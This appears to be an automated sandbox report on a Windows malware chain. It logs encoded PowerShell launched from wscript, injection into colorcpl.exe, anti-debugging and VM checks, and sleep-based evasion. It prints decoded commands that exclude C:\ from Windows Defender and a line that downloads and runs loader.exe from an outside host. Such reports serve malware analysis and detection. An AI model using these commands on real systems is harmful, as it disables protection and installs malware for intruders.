Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312 Thread sleep count: 3019 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7768 Thread sleep time: -72000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7772 Thread sleep time: -510000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7772 Thread sleep time: -28446000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7980 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FF54D0 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 14_2_02FF54D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 20_2_004090DC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 20_2_0040B6B5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 20_2_0041C7E5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 20_2_0040B8BA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0044E989 FindFirstFileExA, 20_2_0044E989
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 20_2_00408CDE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW, 20_2_00419CEE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 20_2_00407EDD
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00406F13 FindFirstFileW,FindNextFileW, 20_2_00406F13
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C7C6CB FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 20_2_06C7C6CB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C7C4C6 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 20_2_06C7C4C6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C78CEE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 20_2_06C78CEE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C8AAFF FindFirstFileW, 20_2_06C8AAFF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CBF79A FindFirstFileExA, 20_2_06CBF79A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C8D5F6 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 20_2_06C8D5F6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C79EED __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 20_2_06C79EED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C77D24 FindFirstFileW,FindNextFileW, 20_2_06C77D24
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C79AEF __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 20_2_06C79AEF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 20_2_00407357
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000009.00000002.1266020687.000002C4F9F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2207211203.000002403125B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000016.00000002.2205682371.000002402BC2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp, Xdnxwtne.PIF, 00000015.00000002.1217550294.00000000005EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: loader.exe, 0000000E.00000002.1069243919.00000000006DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxx
Source: C:\Users\user\AppData\Local\Temp\loader.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\colorcpl.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300B014 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 14_2_0300B014
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Links\Xdnxwtne.PIF Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_0043B88D
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03003FB4 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary, 14_2_03003FB4
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004438F4 mov eax, dword ptr fs:[00000030h] 20_2_004438F4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C710EB mov eax, dword ptr fs:[00000030h] 20_2_06C710EB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C710EB mov eax, dword ptr fs:[00000030h] 20_2_06C710EB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CB4705 mov eax, dword ptr fs:[00000030h] 20_2_06CB4705
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00411999 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError, 20_2_00411999
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00435398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_00435398
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_0043B88D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00434D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00434D6E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00434F01 SetUnhandledExceptionFilter, 20_2_00434F01
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CAC69E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_06CAC69E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA61A9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_06CA61A9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA5D12 SetUnhandledExceptionFilter, 20_2_06CA5D12
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA5B7F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_06CA5B7F

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\ Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6C70000 protect: page execute and read and write Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\loader.exe Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 6C71592 Jump to behavior
Encrypted powershell cmdline option found
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded $url = "http://www.nawatbsc.com/file/loader.exe"$output = "$env:Temp/loader.exe"Invoke-WebRequest -Uri $url -OutFile $outputStart-Process -FilePath $output
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded $url = "http://www.nawatbsc.com/file/loader.exe"$output = "$env:Temp/loader.exe"Invoke-WebRequest -Uri $url -OutFile $outputStart-Process -FilePath $output Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6C70000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6C70000 Jump to behavior
Contains functionality to simulate mouse events
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004197D9 mouse_event, 20_2_004197D9
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA== Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBuAGEAdwBhAHQAYgBzAGMALgBjAG8AbQAvAGYAaQBsAGUALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAbwB1AHQAcAB1AHQACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA== Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\loader.exe "C:\Users\user~1\AppData\Local\Temp\loader.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagcaiabhagqazaagaciasablaewatqbcafmatwbgafqavwbbafiarqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgbcaeuaeabjagwadqbzagkabwbuahmaxabqageadaboahmaigagac8adgagaemaogbcaa==
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc jab1ahiabaagad0aiaaiaggadab0ahaaogavac8adwb3ahcalgbuageadwbhahqaygbzagmalgbjag8abqavagyaaqbsagualwbsag8ayqbkaguacgauaguaeablaciacgakag8adqb0ahaadqb0acaapqagaciajablag4adga6afqazqbtahaalwbsag8ayqbkaguacgauaguaeablaciacgbjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiabaagac0atwb1ahqargbpagwazqagacqabwb1ahqacab1ahqacgbtahqayqbyahqalqbqahiabwbjaguacwbzacaalqbgagkabablafaayqb0aggaiaakag8adqb0ahaadqb0aa==
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagcaiabhagqazaagaciasablaewatqbcafmatwbgafqavwbbafiarqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgbcaeuaeabjagwadqbzagkabwbuahmaxabqageadaboahmaigagac8adgagaemaogbcaa== Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc jab1ahiabaagad0aiaaiaggadab0ahaaogavac8adwb3ahcalgbuageadwbhahqaygbzagmalgbjag8abqavagyaaqbsagualwbsag8ayqbkaguacgauaguaeablaciacgakag8adqb0ahaadqb0acaapqagaciajablag4adga6afqazqbtahaalwbsag8ayqbkaguacgauaguaeablaciacgbjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiabaagac0atwb1ahqargbpagwazqagacqabwb1ahqacab1ahqacgbtahqayqbyahqalqbqahiabwbjaguacwbzacaalqbgagkabablafaayqb0aggaiaakag8adqb0ahaadqb0aa== Jump to behavior
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerG,
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managery_IDC
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr]
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managert]
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerspirpcg
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerJ
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager7.225:9916
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managernfo
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager7.225
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp, logs.dat.20.dr Binary or memory string: [Program Manager]
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00435034 cpuid 20_2_00435034
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 14_2_02FF5694
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: GetLocaleInfoA, 14_2_02FFA2F0
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: GetLocaleInfoA, 14_2_02FFA2A4
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 14_2_02FF57A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_004520E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_00452097
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_0045217D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoA, 20_2_0040F26B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 20_2_0045220A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_0044844E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 20_2_0045245A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 20_2_00452583
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 20_2_0045268A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 20_2_00452757
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 20_2_00448937
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 20_2_00451E1F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoA, 20_2_06C8007C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_06CC2EF3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_06CC2EA8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_06CC2F8E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 20_2_06CC2C30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 20_2_06CB9748
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 20_2_06CC349B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 20_2_06CC3568
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 20_2_06CB925F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 20_2_06CC326B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 20_2_06CC3394
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 20_2_06CC301B
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
